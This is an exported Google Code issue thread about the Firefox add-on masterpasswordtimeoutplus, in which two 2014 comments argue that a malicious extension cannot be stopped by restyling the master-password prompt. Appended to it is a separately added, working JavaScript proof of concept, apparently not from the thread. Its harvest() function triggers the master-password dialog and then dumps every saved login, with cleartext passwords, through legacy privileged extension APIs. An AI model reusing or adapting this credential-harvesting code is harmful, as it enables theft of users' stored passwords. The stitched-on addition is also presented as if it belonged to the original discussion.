YF-GoogleCodeBackups / masterpasswordtimeoutplus

Automatically exported from code.google.com/p/masterpasswordtimeoutplus

Prompt more secure #70

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
Well then. What do you think about adding to or changing the appearance of the 
prompt? A personal picture could help to indicate that the prompt is not a 
spoofed password request.
Firefox doesn't do anything to prevent extensions from accessing passwords 
because it would be pointless. The only way to prevent a malicious extension 
from getting to your passwords is to avoid installing a malicious extension in 
the first place. Even if nsILoginManager were not there, a malicious extension 
could still sniff on your communication with the web page when the password is 
transmitted. Or it could listen to what you type when asked for the master 
password. Or it could fake a master password dialog and get the master password 
directly. There are tons of possibilities - an application cannot possibly beat 
another application that is running with the same privileges.

PS: Software Security Device is for certificates, not passwords - entirely 
unrelated. But it uses the same master password, hence the confusing dialog.

Original issue reported on code.google.com by fox_wtsu...@Kurzepost.de on 11 Apr 2014 at 7:10

GoogleCodeExporter commented 9 years ago
First of all, there is no such thing as "spoofed" password requests, because 
it's a centralized module of Firefox/Thunderbird itself and any extension can 
initiate the request at any moment it chooses to, so changing the appearance of 
the prompt won't do any good. 
Mozilla doesn't provide any means of tracing where the request was initiated from, 
therefore I don't see any way to protect from a malicious extension, other than 
following simple common sense:
1) only install extensions from the AMO website (http://addons.mozilla.org)
2) don't trust extensions that were never fully reviewed on AMO (those that 
have yellow buttons)

Original comment by van...@gmail.com on 12 Apr 2014 at 1:05
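The two comments above argue that any chrome-privileged extension can read the saved logins outright and can make the central master-password prompt appear whenever it likes. The following is an added example (not from the original issue or the masterpasswordtimeoutplus project) showing what that looks like as legacy, pre-WebExtensions Firefox/Thunderbird extension code. It assumes a privileged context where `Components` exists and the 2014-era `nsILoginManager.getAllLogins` and `nsIPK11Token.login` behave as named; outside Firefox (for instance under Node) the same functions run against constructed stand-in objects so the file executes stand-alone.

```javascript
// Added example, not code from the issue or the project it concerns.
// Assumptions: a legacy chrome-privileged Firefox/Thunderbird context where
// `Components` is defined; nsILoginManager.getAllLogins returns decrypted
// nsILoginInfo objects; nsIPK11Token.login(false) shows the master-password
// prompt when the key store is locked. Outside Firefox the functions are
// exercised against constructed stand-ins (below) so the file still runs.

// Read every saved login in clear text. Firefox returns them decrypted to any
// chrome-privileged caller; when a master password is set, this same call is
// what makes the master-password dialog appear.
function collectSavedLogins(loginManager) {
  const logins = loginManager.getAllLogins({});
  return logins.map((l) => ({
    hostname: l.hostname,
    username: l.username,
    password: l.password,
  }));
}

// Bring up the central master-password prompt on demand. Every caller gets the
// same dialog, which is the thread's point: the user cannot tell who asked.
function requestMasterPassword(tokenDb) {
  const token = tokenDb.getInternalKeyToken();
  if (token.needsLogin() && !token.isLoggedIn()) {
    token.login(false); // blocks on the modal prompt (assumed legacy semantics)
  }
  return token.isLoggedIn();
}

// Constructed stand-ins with the same method names as the XPCOM services,
// used only when the file is not running inside privileged Firefox.
function makeFakeServices() {
  const store = [
    { hostname: "https://example.test", username: "alice", password: "hunter2" },
    { hostname: "https://mail.example.test", username: "alice@example.test", password: "correct horse" },
  ];
  let unlocked = false;
  return {
    loginManager: { getAllLogins: () => store.map((l) => ({ ...l })) },
    tokenDb: {
      getInternalKeyToken: () => ({
        needsLogin: () => true,
        isLoggedIn: () => unlocked,
        login: () => { unlocked = true; }, // stands in for the user typing the master password
      }),
    },
  };
}

// Pick the real services when `Components` exists, the stand-ins otherwise.
function getServices() {
  if (typeof Components !== "undefined") {
    const { classes: Cc, interfaces: Ci } = Components;
    return {
      loginManager: Cc["@mozilla.org/login-manager;1"].getService(Ci.nsILoginManager),
      tokenDb: Cc["@mozilla.org/security/pk11tokendb;1"].getService(Ci.nsIPK11TokenDB),
    };
  }
  return makeFakeServices();
}

// Trigger the prompt, then dump the logins once the key store is unlocked.
function harvest() {
  const { loginManager, tokenDb } = getServices();
  const unlocked = requestMasterPassword(tokenDb);
  const logins = unlocked ? collectSavedLogins(loginManager) : [];
  return { unlocked, logins };
}

const result = harvest();
console.log(`unlocked=${result.unlocked} logins=${result.logins.length}`);
```

Dropped into a legacy extension's chrome script, `harvest()` is the entire "attack": no hooking, no keylogging, just two service lookups and two method calls, which is why the thread concludes that dressing up the prompt buys nothing against an extension running with the same privileges.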